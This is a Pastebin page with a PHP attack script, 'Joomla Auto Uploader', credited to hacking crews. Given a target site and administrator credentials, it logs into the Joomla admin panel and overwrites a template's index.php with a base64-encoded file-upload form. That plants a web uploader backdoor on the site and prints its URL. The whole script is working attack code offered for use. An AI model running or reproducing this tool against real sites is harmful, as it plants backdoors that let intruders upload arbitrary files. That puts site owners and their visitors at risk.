Souheyel11

Joomla Auto Uploader | Dev-tun.tn

Jul 11th, 2014
560
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 3.88 KB | None | 0 0
  1. <?
  2.     /*
  3.         Title : Joomla Auto Uploader v1
  4.         By    : xSecurity
  5.         4u    : Lov3rDNS - Mr.Dm4r - x00x TeaM - b0x !
  6.         home  : sec4ever.com - is-sec.com
  7.         Usage : php uploader.php
  8.             -> target.com
  9.             -> username
  10.             -> password
  11.             -> then go to target.com/templates/beez5/index.php
  12.         & gz :)
  13.     */
  14.     print("
  15.   _                       _                     _                 _
  16.  (_) ___   ___  _ __ ___ | | __ _   _   _ _ __ | | ___   __ _  __| |
  17.  | |/ _ \ / _ \| '_ ` _ \| |/ _` | | | | | '_ \| |/ _ \ / _` |/ _` |
  18.  | | (_) | (_) | | | | | | | (_| | | |_| | |_) | | (_) | (_| | (_| |
  19. _/ |\___/ \___/|_| |_| |_|_|\__,_|  \__,_| .__/|_|\___/ \__,_|\__,_|
  20. |__/                                      |_|xSecurity\n\n");
  21.    
  22.     $path = "/administrator/index.php?option=com_templates&view=source&layout=edit";
  23.     print "[*] target: ";
  24.     $url = trim(fgets(STDIN,1024));
  25.     $target = "http://".$url.$path;
  26.     print "[*] Username: ";
  27.     $user = trim(fgets(STDIN,1024));
  28.     print "[*] Password: ";
  29.     $pass = trim(fgets(STDIN,1024));
  30.    
  31.     $uploader = base64_decode("PD8KCWVjaG8gJzx0aXRsZT5VcGxvYWQgRmlsZXMgeFNlY3VyaXR5PC90aXRsZT4nOwoJZWNobyAnPGZvcm0gYWN0aW9uPSIiIG1ldGhvZD0icG9zdCIgZW5jdHlwZT0ibXVsdGlwYXJ0L2Zvcm0tZGF0YSIgbmFtZT0idXBsb2FkZXIiIGlkPSJ1cGxvYWRlciI+JzsKCWVjaG8gJzxpbnB1dCB0eXBlPSJmaWxlIiBuYW1lPSJmaWxlIiBzaXplPSI1MCI+PGlucHV0IG5hbWU9Il91cGwiIHR5cGU9InN1Ym1pdCIgaWQ9Il91cGwiIHZhbHVlPSJVcGxvYWQiPjwvZm9ybT4nOwoJaWYoJF9QT1NUWydfdXBsJ10gPT0gIlVwbG9hZCIpCgl7CgkJaWYoQGNvcHkoJF9GSUxFU1snZmlsZSddWyd0bXBfbmFtZSddLCAkX0ZJTEVTWydmaWxlJ11bJ25hbWUnXSkpIAoJCXsgCgkJCWVjaG8gJzxiPlVwbG9hZCBDb21wbGF0ZSAhISE8L2I+PGJyPjxicj4nOyAKCQl9IGVsc2UgeyAKCQllY2hvICc8Yj5VcGxvYWQgRmFpbGVkICEhITwvYj48YnI+PGJyPic7IAoJCX0KCX0KCWVjaG8gJyNJbmplY3QgQnkgeFNlY3VyaXR5IHQwMGwgOyknOwo/Pg==");
  32.     $loginHash = token($target);
  33.     $login = brute($target,$user,$pass,$loginHash);
  34.     if($login)
  35.     {
  36.         print "[+] Login Complete ..\n";
  37.         $uploadHash = token($target);
  38.         print "[+] Token: {$uploadHash}\n";
  39.         print "[+] Trying To Upload .. \n";
  40.         $ups = upload($target,$uploader,$uploadHash);
  41.         if(eregi("File successfully saved",$ups))
  42.         {
  43.             print "[+] Upload Complete :)\n";
  44.             print "[+] Here Uploader : http://{$url}/templates/beez5/index.php\n";
  45.         } else {
  46.             print "[-] ERROR";
  47.         }
  48.     }
  49.     # Functionz
  50.     function token($target)
  51.     {
  52.         $curl = curl_init();
  53.         curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
  54.         curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
  55.         curl_setopt($curl,CURLOPT_URL, $target);
  56.         curl_setopt($curl,CURLOPT_COOKIEJAR, getcwd()."./cookie.txt");
  57.         curl_setopt($curl,CURLOPT_COOKIEFILE, getcwd()."./cookie.txt");
  58.         $get = curl_exec($curl);
  59.         preg_match('/<input type="hidden" name="(.*?)" value="1"/', $get, $token);
  60.         return $token[1];
  61.     }
  62.     function brute($target,$user,$pass,$loginHash)
  63.     {
  64.         $curl = curl_init();
  65.         curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
  66.         curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
  67.         curl_setopt($curl,CURLOPT_URL, $target);
  68.         curl_setopt($curl,CURLOPT_POSTFIELDS,"username={$user}&passwd={$pass}&lang=&option=com_login&task=login&return=aW5kZXgucGhwP29wdGlvbj1jb21fdGVtcGxhdGVzJnRhc2s9c291cmNlLmVkaXQmaWQ9TlRBMU9tbHVaR1Y0TG5Cb2NBPT0=&{$loginHash}=1");
  69.         @curl_setopt($curl,CURLOPT_COOKIEJAR, getcwd()."./cookie.txt");
  70.         @curl_setopt($curl,CURLOPT_COOKIEFILE, getcwd()."./cookie.txt");
  71.         $brute = curl_exec($curl);
  72.         return $brute;
  73.     }
  74.     function upload($target,$uploader,$uploadHash)
  75.     {
  76.         $curl = curl_init();
  77.         curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
  78.         curl_setopt($curl,CURLOPT_FOLLOWLOCATION,1);
  79.         curl_setopt($curl,CURLOPT_URL, $target);
  80.         curl_setopt($curl,CURLOPT_POSTFIELDS,"jform%5Bsource%5D={$uploader}&task=source.apply&{$uploadHash}=1&jform%5Bextension_id%5D=505&jform%5Bfilename%5D=index.php");
  81.         @curl_setopt($curl,CURLOPT_COOKIEJAR, getcwd()."./cookie.txt");
  82.         @curl_setopt($curl,CURLOPT_COOKIEFILE, getcwd()."./cookie.txt");
  83.         $upload = curl_exec($curl);
  84.         return $upload;
  85.     }
  86.     @system("del cookie.txt");
  87. ?>
Add Comment
Please, Sign In to add comment